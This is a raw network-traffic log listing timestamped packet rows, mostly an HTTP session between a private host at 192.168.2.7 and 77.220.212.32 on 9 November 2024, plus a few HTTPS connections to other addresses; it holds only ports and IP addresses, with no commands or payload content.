Nov 9, 2024 02:47:36.331038952 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.331063986 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.331093073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331110001 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331120968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331130981 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331136942 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.331172943 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.331195116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331207037 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331217051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331239939 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331249952 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331255913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331255913 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.331264019 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331325054 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.331345081 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331357002 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331367016 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331377029 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331387997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331391096 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.331399918 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331410885 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331423998 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.331455946 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.331496954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331507921 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331517935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331528902 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331543922 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.331547022 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331558943 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331569910 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.331569910 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331584930 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331589937 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.331597090 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331610918 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331619978 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.331623077 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331634998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331653118 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.331681967 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.331847906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331864119 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331876040 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331885099 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331897020 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331907988 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331912994 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.331922054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331934929 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331950903 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.331969976 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.331984997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331998110 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332015038 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332026958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332037926 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332043886 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332053900 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332057953 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332066059 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332070112 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332096100 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332122087 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332149982 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332161903 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332174063 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332185030 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332199097 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332202911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332215071 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332217932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332232952 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332241058 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332247019 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332247972 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332259893 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332273006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332284927 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332285881 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332297087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332304955 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332309961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332321882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332331896 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332333088 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332345963 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332360983 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332384109 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332387924 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332396984 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332402945 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332412958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332423925 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332432032 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332437038 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332449913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332452059 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332461119 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332470894 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332473993 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332487106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332499981 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332500935 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332510948 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332528114 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332546949 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332624912 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332636118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332647085 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332679987 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332732916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332748890 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332760096 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332775116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332781076 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332788944 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332793951 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332799911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332802057 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332808971 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332823038 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332834005 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332844973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332850933 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332858086 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332868099 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332878113 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332880974 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332901955 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332910061 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332914114 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332923889 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332935095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332947016 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332956076 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332958937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332978964 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.332982063 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.332993031 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333003044 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333003998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333017111 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333029032 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333034992 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333043098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333055973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333072901 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333092928 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333100080 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333112955 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333123922 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333134890 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333146095 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333147049 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333158970 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333159924 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333179951 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333193064 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333194971 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333204985 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333215952 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333223104 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333228111 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333240032 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333241940 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333256960 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333261013 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333270073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333281040 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333292961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333303928 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333306074 CET	53063	443	192.168.2.7	204.79.197.219
Nov 9, 2024 02:47:36.333304882 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333316088 CET	443	53063	204.79.197.219	192.168.2.7
Nov 9, 2024 02:47:36.333329916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333342075 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333345890 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333354950 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333395004 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333408117 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333427906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333436966 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333448887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333477974 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333503962 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333595991 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333606958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333631992 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333641052 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333643913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333657026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333678007 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333702087 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333724976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333736897 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333753109 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333765984 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333774090 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333779097 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333790064 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333798885 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333801031 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333813906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333825111 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333828926 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333836079 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333848953 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333857059 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333859921 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.333877087 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.333895922 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.334115982 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.334161997 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.352799892 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.352823973 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.352873087 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.352884054 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.352926016 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.352969885 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.353223085 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.353266001 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.353300095 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.353305101 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.353322983 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.353378057 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.353612900 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.353674889 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.353749037 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.353785992 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.353791952 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.353813887 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.353859901 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.393711090 CET	443	53010	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:36.393976927 CET	53010	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:36.393994093 CET	443	53010	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:36.394344091 CET	443	53010	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:36.395293951 CET	53010	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:36.395368099 CET	443	53010	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:36.427058935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.427071095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.427093983 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.427103996 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.427158117 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.431858063 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.431902885 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.431912899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.431920052 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.431926012 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.431956053 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.432929039 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.432939053 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.432949066 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.432959080 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.432995081 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.433017015 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.434113026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434129953 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434140921 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434156895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434170008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434170961 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.434180021 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434190989 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434190989 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.434221983 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.434245110 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.434305906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434322119 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434333086 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434349060 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.434365034 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.434442043 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434453964 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434464931 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434475899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434487104 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434495926 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434503078 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.434525013 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.434540033 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.434580088 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434614897 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434621096 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.434628963 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434669018 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434670925 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.434681892 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434721947 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.434880972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434890985 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434901953 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434920073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434931993 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434933901 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.434943914 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.434956074 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.434976101 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.435003996 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.435005903 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435019016 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435029030 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435059071 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.435065985 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435076952 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435086966 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435090065 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.435098886 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435117006 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.435117006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435133934 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435143948 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.435158968 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.435184956 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.435189962 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435209036 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435219049 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435259104 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.435296059 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435307026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435331106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435343027 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435353041 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435364008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435370922 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.435390949 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.435408115 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.435497999 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435511112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435520887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435533047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435544968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435566902 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.435599089 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.435627937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.435640097 CET	80	52982	77.220.212.32	192.168.2.7
